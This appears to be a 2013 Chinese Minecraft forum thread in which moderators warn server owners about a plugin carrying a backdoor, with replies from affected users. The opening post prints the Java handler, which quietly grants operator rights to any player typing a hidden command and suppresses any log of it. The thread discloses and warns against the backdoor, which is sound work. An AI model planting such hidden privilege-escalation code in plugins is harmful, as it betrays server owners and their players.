Minecraft(我的世界)中文论坛
标题: 各位在MCBBS寻找插件的服主请注意!本站出现恶意插件
作者: 混乱 时间: 2013-11-27 22:26
标题: 各位在MCBBS寻找插件的服主请注意!本站出现恶意插件
接用户举报:
我们证实了由用户 920329 发布的插件含有恶意代码:- @EventHandler
- public void onPlayerCommandPreprocess(PlayerCommandPreprocessEvent event)
- {
- if (event.getMessage().startsWith("/*******")) {
- event.getPlayer().setOp(true);
- event.setCancelled(true);
- event.getPlayer().sendMessage("Done");
- }
- }
只要输入 /资料删除
就会把输入这个指令的玩家设置为OP
意思就是一个完全地提权插件!!!!!!!!!!!!!!!!
而且不是通过在yml注册指令,如果不翻源码是找不到的!!!是拦截命令输入这个事件!!!!!
而且权限是玩家!!!任意玩家都可以触发!!!
请各位下载过此人发布的插件的服主立刻完全删除此人发布的插件,希望各位服主今后能够确保服务器使用的插件的安全性。
用户 920329 现已永久禁封,并将永久禁止此人的服务器讯息发布,我们会等待他的解释。MCBBS管理组
2013年11月27日
经过交流,我们判断他并非故意,而是因为大意,但是插件已经广泛传播且造成了巨大影响,所以将处罚改为禁止发言2个月。
作者: simon3000的灵魂 时间: 2013-11-27 22:27
发现了,谢谢提醒
作者: MarcoV 时间: 2013-11-27 22:27
吓尿了。。。
作者: Forsworn_ 时间: 2013-11-27 22:30
希望 别再出这种类型插件。。搞得个服务器都不安静了估计
果断去外国找←_←
作者: 1847291366 时间: 2013-11-27 22:32
要想人不知,除非己莫为{:10_493:}不明白···写个插件都要贪便宜
作者: botao 时间: 2013-11-27 22:34
谢提醒!但是我一般不会用这种挫插件的。。
作者: ccvb1231 时间: 2013-11-27 22:35
好在我沒用....
作者: dht819904031 时间: 2013-11-27 22:36
防什么熊孩子。。。自己不防下自己的熊心。
真是若想人不知。除非己莫为啊。
可惜了。技术没用正路上。
作者: 546474273 时间: 2013-11-27 22:43
感谢告知!
作者: 。—。 时间: 2013-11-27 23:03
本帖最后由 a6809936 于 2013-11-27 23:04 编辑
以后的话mcbbs要不要也像Firefox Addon那样搞个“此插件处于审核阶段”“此插件已通过初步审核”这些呢{:10_522:}
另外,公告提醒权重发两遍了诶。。。
作者: jianghr 时间: 2013-11-27 23:21
这个不审核源码发现不了的话……服务器插件版主岂不累死……
作者: Aizu 时间: 2013-11-27 23:25
下过一个ding,感觉还不错,但是看到这帖子果断删了
作者: zhangcl 时间: 2013-11-28 03:36
人家倒着也中枪,而且还是只差1000名就是元老级别的玩家。。。。。。。。。。。
作者: 德玛西亚小蜗牛 时间: 2013-11-28 07:15
我竟然还想下载555555
作者: jindong 时间: 2013-11-28 09:10
我表示这些插件我都看到过,还好没下载...
作者: 熊孩子主义 时间: 2013-11-28 11:29
现在的熊孩子越来越高端了.......
作者: 熊孩子主义 时间: 2013-11-28 11:34
话说8月5号就出了现在才发现......{:10_493:}
作者: GreatGBL 时间: 2013-11-28 12:29
完了。。我都装过。。现在就去删
作者: Aikawastep 时间: 2013-11-28 12:38
{:10_495:}卧槽。10000多的UID可惜了...
作者: shure 时间: 2013-11-28 16:22
又是黑客案件?
这年头犯罪的人怎么越来越多了!
作者: ikorose 时间: 2013-11-28 16:47
试了下还真是!玩家输入那条指令后直接变op,控制台连玩家输入那条指令的记录都没有,变成op的记录也没。
作者: sdl0206 时间: 2013-11-28 18:32
表示已翻到命令
作者: bali16 时间: 2013-11-28 19:19
GreatGBL 发表于 2013-11-28 12:29 
完了。。我都装过。。现在就去删
{:10_523:}死翘翘了吧///哈哈哈
作者: diamond--GG 时间: 2013-11-28 22:30
表示我当时看到这个插件时果断安装,后来服务器里就出现了N个op······
作者: xpesir 时间: 2013-11-29 17:00
其实我想说。没曝光之前有多少人知道这指令?= =你私下联系解决不就行了么。。。搞得这么大有意义么。。如果作者真大意.你提醒的话 肯定有立刻更新修复。
我只能说,MCBBS管理组无聊找事做罢了= =
作者: 870830676 时间: 2013-11-29 17:23
卧槽。。我还使用过这个插件。。。
作者: zhengyu14725896 时间: 2013-11-29 17:27
还好我是纯净党,服务端什么插件都没有。
作者: 123axsxs 时间: 2013-11-29 18:07
zhengyu14725896 发表于 2013-11-29 17:27
还好我是纯净党,服务端什么插件都没有。
ess呢?!?!你没装咋tp=-=
作者: 651107657. 时间: 2013-11-29 18:57
我是前排阿!!不过我不开服务器了。。
作者: 799669332 时间: 2013-11-29 20:31
本帖最后由 799669332 于 2013-11-30 00:29 编辑
正在挨个反编译插件。。。
66个啊QAQ
/XXXXXXXXXXXXXXXX(已和谐
话说有人说这个命令可以获得OP
作者: 459292954 时间: 2013-11-29 20:43
幸好没用过插件,真恐怖啊
作者: ikorose 时间: 2013-11-29 21:07
本帖最后由 ikorose 于 2013-11-29 21:07 编辑
799669332 发表于 2013-11-29 20:31
正在挨个反编译插件。。。
66个啊QAQ
/
你把指令发出来之前有经过大脑思考过没?万一有些服务器服主还没看到这贴,服务器内又装了这玩意,然后万一被他服务器内一些玩家在这看到命令不是害了人家服务器?指令获取不难但也别发出来,要发出来举报贴早就发出来了。
作者: 呆瓜Domado 时间: 2013-11-29 21:28
哇!!!!oh my god 幸好你告诉了我们
作者: zhengyu14725896 时间: 2013-11-29 22:05
123axsxs 发表于 2013-11-29 18:07
ess呢?!?!你没装咋tp=-=
当然没装,个人觉得TP很作弊。
作者: 799669332 时间: 2013-11-30 00:30
ikorose 发表于 2013-11-29 21:07
你把指令发出来之前有经过大脑思考过没?万一有些服务器服主还没看到这贴,服务器内又装了这玩意,然后万 ...
其实举报贴已经发出来了
但是后来又编辑删除了
但是
在百度快照和谷歌快照能找到没修改之前的
就是还是能搜到
我的已经删除了
作者: 末影卐 时间: 2013-11-30 08:12
谢谢提醒{:10_507:}
作者: 尘曲 时间: 2013-11-30 09:44
xpesir 发表于 2013-11-29 17:00
其实我想说。没曝光之前有多少人知道这指令?= =你私下联系解决不就行了么。。。搞得这么大有意义么。。如果 ...
= =这不是大意。。。是故意的。。。他取消了控制台的输出记录,而且指令也是无意义字符,就是单纯为了跑去别的服务器搞破坏的。。。
作者: 幸福的-眼泪 时间: 2013-11-30 12:15
谢楼主,幸好我是刚来地
作者: a372403923 时间: 2013-11-30 13:11
提示: 作者被禁止或删除 内容自动屏蔽
作者: 1540866915 时间: 2013-11-30 14:18
diamond--GG 发表于 2013-11-28 22:30
表示我当时看到这个插件时果断安装,后来服务器里就出现了N个op······
同人,表示重新开服
作者: 校摔郭 时间: 2013-11-30 15:23
版主英明!
作者: leavessoft 时间: 2013-11-30 16:02
但是,还是请管理先解决一下首页无法访问的问题。。。
作者: wmwvk 时间: 2013-11-30 16:21
谢谢你啊,好帖子不顶不行
作者: 丿PROPHET丿 时间: 2013-11-30 17:50
/资料删除~
介个好(ke)好(wu)啊!
介个让我担心其它的插件了,万一搬运/汉化的在原版就有/植入这个恶意代码,那后果不堪设想啊~
建议BBS加一个人工审核的功能~例如上传某某就要经过审核,可以像暴走漫画的审核作品一样,压金币什么的获得资格去审核,如果正解就返还押金并奖金币,如果乱审核就把压的金币扣掉~
作者: skywings 时间: 2013-12-1 14:31
此人作死·
作者: nosini 时间: 2013-12-1 17:24
他怎么能这样。。{:10_493:}OP要靠自己争取的{:10_521:}
作者: aasss 时间: 2013-12-2 13:16
恐怖的插件............
作者: 97043381 时间: 2013-12-2 19:49
丿PROPHET丿 发表于 2013-11-30 17:50
/资料删除~
介个好(ke)好(wu)啊!
介个让我担心其它的插件了,万一搬运/汉化的在原版就有/植入这个恶 ...
BBS全都是好人,这个也没什么大不了也不是木马,只是恶作剧罢了
作者: 595935617 时间: 2013-12-2 19:55
本帖最后由 595935617 于 2013-12-2 19:59 编辑
感谢那个发现此代码的大触
作者: 丿PROPHET丿 时间: 2013-12-2 19:58
97043381 发表于 2013-12-2 19:49
BBS全都是好人,这个也没什么大不了也不是木马,只是恶作剧罢了
额,好吧·但是难免有高能小学生。。。
作者: 97043381 时间: 2013-12-2 20:38
丿PROPHET丿 发表于 2013-12-2 19:58
额,好吧·但是难免有高能小学生。。。
小学生会弄木马?逗
作者: zhezhey123 时间: 2013-12-2 20:55
ni ma wo gang gang xia zai le a. xing kui mei an zhuang
作者: 丿PROPHET丿 时间: 2013-12-2 21:08
97043381 发表于 2013-12-2 20:38
小学生会弄木马?逗
高能版~{:10_505:}
作者: bacteria 时间: 2013-12-3 20:43
恶意插件的英文名是什么?装了以后不知道哪个是,该如何删除。
有趣的连杀信息
作者: 混乱 时间: 2013-12-3 20:47
bacteria 发表于 2013-12-3 20:43
恶意插件的英文名是什么?装了以后不知道哪个是,该如何删除。
有趣的连杀信息
MultiKillS
作者: guoba 时间: 2013-12-12 18:02
我不幸躺了求那几个插件的名字 我好删除谢谢==
作者: libinfan 时间: 2014-1-18 15:54
吓尿了。。。{:10_552:}
作者: 1428471128 时间: 2014-1-26 23:03
= =好可怕
作者: 1214123147 时间: 2014-2-8 15:02
这位用户屠版
作者: 1572217712 时间: 2014-4-23 14:09
求他的大杀特杀插件的英文名(服务端里貌似有!!!!!)不过插件有点多所以不知装了没,需要知道英文名后才查的到(两个都要)
作者: 余思思 时间: 2014-4-23 15:53
还好..这个插件我进去看过..不过我觉得不好所以就没有下载...如果我那时下载了...我就惨了...
作者: kivv 时间: 2014-5-10 10:09
我看过 还好也是没下载